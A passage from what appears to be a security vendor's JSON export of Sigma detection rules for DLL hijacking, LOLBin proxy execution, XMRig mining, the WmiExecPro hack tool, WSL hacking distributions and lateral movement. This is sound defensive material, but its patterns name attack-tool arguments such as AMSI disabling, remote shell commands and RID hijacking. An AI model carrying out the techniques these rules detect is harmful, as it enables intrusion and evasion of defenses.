'\\ipconfig.exe'\n - '\\route.exe'\n - '\\netsh.exe'\n - '\\makecab.exe'\n\n filter_legitimate:\n Image:\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\System32\\route.exe'\n - '?:\\Windows\\System32\\netsh.exe'\n - '?:\\Windows\\System32\\makecab.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "51195556-a3b2-47a1-b067-fefb536cee6d",
"rule_name": "Proxy Execution via IEDiagCmd.exe",
"rule_description": "Detects the execution of a malicious binary launched through the legitimate IEDiagCmd.exe utility.\nIEDiagCmd.exe is a diagnostics utility for Internet Explorer that can be abused to proxy execution of arbitrary payloads.\nWhen the \"%WINDIR%\" environment variable is modified and IEDiagCmd.exe is executed with the /out parameter, it attempts to load netsh.exe from a modified path (e.g. \"C:\\test\\system32\\netsh.exe\").\nThis behavior may indicate abuse of the IEDiagCmd LOLBin technique to execute attacker-controlled binaries through a trusted Windows process, bypassing security controls.\nIt is recommended to verify if the windir environment variable was modified prior to execution, and to examine the binary being executed to determine if this activity was legitimate.\n",
"rule_creation_date": "2025-06-13",
"rule_modified_date": "2025-06-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "51361589-98fe-4662-a6f3-76ae1ba32fe2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086274Z",
"creation_date": "2026-03-23T11:45:34.086276Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086281Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_musnotification.yml",
"content": "title: DLL Hijacking via musnotification.exe\nid: 51361589-98fe-4662-a6f3-76ae1ba32fe2\ndescription: |\n Detects potential Windows DLL Hijacking via musnotification.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'musnotification.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\UpdatePolicy.dll'\n - '\\UPShared.dll'\n - '\\USERENV.dll'\n - '\\WINHTTP.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "51361589-98fe-4662-a6f3-76ae1ba32fe2",
"rule_name": "DLL Hijacking via musnotification.exe",
"rule_description": "Detects potential Windows DLL Hijacking via musnotification.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "515b9032-e1d4-442f-8fc9-0b5ee25854c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613795Z",
"creation_date": "2026-03-23T11:45:34.613799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613806Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://xmrig.com/docs/miner/command-line-options",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_xmrig_cryptominer_commandline_args_linux.yml",
"content": "title: Possible XMRig Execution (Linux)\nid: 515b9032-e1d4-442f-8fc9-0b5ee25854c3\ndescription: |\n Detects suspicious command-line arguments commonly associated with XMRig execution.\n XMRig is an open-source cryptocurrency mining software often abused by adversaries to mine Monero on infected systems.\n It is recommended to investigate the source of such arguments, monitor for irregular mining activity, analyze the process chain leading to the execution, and review network traffic.\n Consider terminating suspicious processes and isolating the affected system for further analysis.\nreferences:\n - https://xmrig.com/docs/miner/command-line-options\n - https://attack.mitre.org/techniques/T1496/\ndate: 2022/11/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.CryptoMiner.XMRig\n - classification.Linux.Behavior.CryptoMiner\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - ' --rig-id'\n - ' --argon2-impl'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "515b9032-e1d4-442f-8fc9-0b5ee25854c3",
"rule_name": "Possible XMRig Execution (Linux)",
"rule_description": "Detects suspicious command-line arguments commonly associated with XMRig execution.\nXMRig is an open-source cryptocurrency mining software often abused by adversaries to mine Monero on infected systems.\nIt is recommended to investigate the source of such arguments, monitor for irregular mining activity, analyze the process chain leading to the execution, and review network traffic.\nConsider terminating suspicious processes and isolating the affected system for further analysis.\n",
"rule_creation_date": "2022-11-15",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5189d993-9c1a-40b7-981c-00057f326e96",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599685Z",
"creation_date": "2026-03-23T11:45:34.599689Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599696Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoftedgebchost.yml",
"content": "title: DLL Hijacking via microsoftedgebchost.exe\nid: 5189d993-9c1a-40b7-981c-00057f326e96\ndescription: |\n Detects potential Windows DLL Hijacking via microsoftedgebchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgebchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5189d993-9c1a-40b7-981c-00057f326e96",
"rule_name": "DLL Hijacking via microsoftedgebchost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via microsoftedgebchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "518c2cf8-5933-4ec7-b1a9-bf85a9b376a7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608686Z",
"creation_date": "2026-03-23T11:45:34.608689Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608696Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/XiaoliChan/wmiexec-Pro",
"https://attack.mitre.org/techniques/T1047/"
],
"name": "t1047_wmiexecpro.yml",
"content": "title: WMIExecPro HackTool Executed\nid: 518c2cf8-5933-4ec7-b1a9-bf85a9b376a7\ndescription: |\n Detects default command-line arguments from WmiExecPro.\n Windows Management Instrumentation (WMI) allows remote control and management of Windows systems, and WmiExecPro is a tool often used by attackers for command execution.\n It is recommended to investigate the source of the WmiExecPro execution, review network traffic for suspicious WMI activities, and assess whether the command-line arguments are legitimate or indicative of malicious intent.\nreferences:\n - https://github.com/XiaoliChan/wmiexec-Pro\n - https://attack.mitre.org/techniques/T1047/\ndate: 2023/09/01\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WmiExecPro\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'python.exe'\n\n selection_cmd_amsi:\n CommandLine|contains|all:\n - ' amsi '\n - ' -disable'\n\n selection_cmd_exec_command_1:\n CommandLine|contains: ' exec-command '\n\n selection_cmd_exec_command_2:\n CommandLine|contains:\n - ' -shell'\n - ' -command'\n - ' -silent'\n\n selection_cmd_rdp_1:\n CommandLine|contains: ' rdp '\n\n selection_cmd_rdp_2:\n CommandLine|contains:\n - ' -enable'\n - ' -enable-ram'\n - ' -disable'\n - ' -disable-ram'\n\n selection_cmd_firewall_1:\n CommandLine|contains: ' firewall '\n\n selection_cmd_firewall_2:\n CommandLine|contains:\n - ' -dump'\n - ' -search-port'\n - ' -rule-id'\n - ' -firewall-profile'\n\n selection_cmd_execute_vbs_1:\n CommandLine|contains: ' execute-vbs '\n\n selection_cmd_execute_vbs_2:\n CommandLine|contains:\n - ' -vbs'\n - ' -filter'\n - ' -timer'\n - ' -remove'\n - ' -deep-clean'\n\n selection_cmd_rid_hijack_1:\n CommandLine|contains: ' rid-hijack '\n\n selection_cmd_rid_hijack_2:\n CommandLine|contains:\n - ' -query'\n - ' -user'\n - ' -hijack-rid'\n - ' -action'\n - ' -blank-pass-login'\n - ' -restore'\n\n condition: selection and (\n selection_cmd_amsi or\n all of selection_cmd_exec_command_* or\n all of selection_cmd_rdp_* or\n all of selection_cmd_firewall_* or\n all of selection_cmd_execute_vbs_* or\n all of selection_cmd_rid_hijack_*)\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "518c2cf8-5933-4ec7-b1a9-bf85a9b376a7",
"rule_name": "WMIExecPro HackTool Executed",
"rule_description": "Detects default command-line arguments from WmiExecPro.\nWindows Management Instrumentation (WMI) allows remote control and management of Windows systems, and WmiExecPro is a tool often used by attackers for command execution.\nIt is recommended to investigate the source of the WmiExecPro execution, review network traffic for suspicious WMI activities, and assess whether the command-line arguments are legitimate or indicative of malicious intent.\n",
"rule_creation_date": "2023-09-01",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "51ab3513-a96b-4ba0-ba57-465e81bdb29c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617738Z",
"creation_date": "2026-03-23T11:45:34.617740Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617745Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_ruby_file_create_susp_location.yml",
"content": "title: File Created in Suspicious Folder via Ruby\nid: 51ab3513-a96b-4ba0-ba57-465e81bdb29c\ndescription: |\n Detects a file creation by Ruby in a suspicious location.\n Adversaries may use Ruby to download and execute further tools.\n It is recommended to check the content of the created file to determine its legitimacy.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/09/26\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.Filesystem\n - classification.macOS.Script.Ruby\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Image|endswith: '/ruby'\n Kind: 'create'\n Path|startswith:\n - '/usr/local/bin/'\n - '/users/shared/'\n - '/private/etc/'\n\n exclusion_homebrew:\n Image|startswith: '/usr/local/Homebrew/'\n Path|startswith: '/usr/local/bin/'\n\n exclusion_gem:\n Path|startswith: '/usr/local/bin'\n ProcessParentCommandLine|contains: 'gem install '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "51ab3513-a96b-4ba0-ba57-465e81bdb29c",
"rule_name": "File Created in Suspicious Folder via Ruby",
"rule_description": "Detects a file creation by Ruby in a suspicious location.\nAdversaries may use Ruby to download and execute further tools.\nIt is recommended to check the content of the created file to determine its legitimacy.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-03-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "51ee3e20-cde8-4c82-a9d2-51a87360411b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297255Z",
"creation_date": "2026-03-23T11:45:35.297257Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297261Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/04/20/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-2",
"https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wsl_hacking_distribution_installation.yml",
"content": "title: Hacking Distribution Installed Under WSL\nid: 51ee3e20-cde8-4c82-a9d2-51a87360411b\ndescription: |\n Detects the installation of various Linux hacking distributions through Windows Subsystem For Linux (WSL).\n Popular hacking distributions provide pre-installed penetration testing and security assessment tools that could be leveraged for malicious purposes.\n Threat actors may abuse WSL to evade Windows security controls and execute malicious code.\n It is recommended to monitor process trees and subsequent WSL activities for signs of malicious behavior.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/04/20/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-2\n - https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux\n - https://attack.mitre.org/techniques/T1202/\ndate: 2025/01/06\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Lxss\\\\*\\DistributionName'\n Details|contains:\n - 'kali-linux'\n - 'Athena'\n - 'ParrotOS'\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "51ee3e20-cde8-4c82-a9d2-51a87360411b",
"rule_name": "Hacking Distribution Installed Under WSL",
"rule_description": "Detects the installation of various Linux hacking distributions through Windows Subsystem For Linux (WSL).\nPopular hacking distributions provide pre-installed penetration testing and security assessment tools that could be leveraged for malicious purposes.\nThreat actors may abuse WSL to evade Windows security controls and execute malicious code.\nIt is recommended to monitor process trees and subsequent WSL activities for signs of malicious behavior.\n",
"rule_creation_date": "2025-01-06",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52550a8d-626b-41ed-8999-c4d5ffca7060",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087381Z",
"creation_date": "2026-03-23T11:45:34.087383Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087388Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_lateral-movement.htm",
"https://attack.mitre.org/techniques/T1036/004/"
],
"name": "t1036_004_service_image_remote.yml",
"content": "title: Remote Image Executed as a Service\nid: 52550a8d-626b-41ed-8999-c4d5ffca7060\ndescription: |\n Detects attempts to execute remote images through service creation and installation, a technique commonly employed in lateral movement.\n This method, notably used by Cobalt Strike's PsExec module, allows attackers to move laterally by creating services on remote systems that execute malicious payloads.\n While legitimate administrative tools may use similar techniques, unauthorized remote service execution often indicates adversary activity.\n It is recommended to investigate the source of remote service creation, validate the legitimacy of the service binary path, and correlate with authentication logs to identify potential lateral movement attempts.\nreferences:\n - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_lateral-movement.htm\n - https://attack.mitre.org/techniques/T1036/004/\ndate: 2020/12/09\nmodified: 2025/07/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.execution\n - attack.t1569.002\n - attack.lateral_movement\n - attack.t1021.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\Windows\\System32\\services.exe'\n Image: '\\\\\\\\*\\ADMIN$\\\\*.exe'\n exclusion_microsoft_configuration_mgr:\n ProcessSigned: 'true'\n ProcessProduct: 'Microsoft Configuration Manager'\n ProcessSignature: 'Microsoft Corporation'\n exclusion_raynet:\n ProcessProduct: 'RayManageSoft'\n ProcessCompany: 'Raynet GmbH'\n ProcessDescription: 'Remote Execution Service'\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52550a8d-626b-41ed-8999-c4d5ffca7060",
"rule_name": "Remote Image Executed as a Service",
"rule_description": "Detects attempts to execute remote images through service creation and installation, a technique commonly employed in lateral movement.\nThis method, notably used by Cobalt Strike's PsExec module, allows attackers to move laterally by creating services on remote systems that execute malicious payloads.\nWhile legitimate administrative tools may use similar techniques, unauthorized remote service execution often indicates adversary activity.\nIt is recommended to investigate the source of remote service creation, validate the legitimacy of the service binary path, and correlate with authentication logs to identify potential lateral movement attempts.\n",
"rule_creation_date": "2020-12-09",
"rule_modified_date": "2025-07-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1036.004",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5258ce45-d23f-411e-8ffe-675a220f6420",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080151Z",
"creation_date": "2026-03-23T11:45:34.080153Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080157Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/Mr-Un1k0d3r/PowerLessShell",
"https://attack.mitre.org/techniques/T1127/001/",
"https://attack.mitre.org/techniques/T1027/004/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1127_001_msbuild_powershell_execution.yml",
"content": "title: PowerShell Script Executed via MSBuild\nid: 5258ce45-d23f-411e-8ffe-675a220f6420\ndescription: |\n Detects a PowerShell script execution by the MSBuild process.\n Attackers often deliver PowerShell scripts as uncompiled code, and in order to hide the powershell.exe process, compile them directly on the victim's machine.\n This can be indicative of a PowerShell-less attack such as PowerLessShell or through frameworks such as Empire.\n It is recommended to analyze the executed PowerShell script for malicious content.\nreferences:\n - https://github.com/Mr-Un1k0d3r/PowerLessShell\n - https://attack.mitre.org/techniques/T1127/001/\n - https://attack.mitre.org/techniques/T1027/004/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2023/04/03\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1127.001\n - attack.t1027.004\n - attack.t1036\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.LOLBin.Msbuild\n - 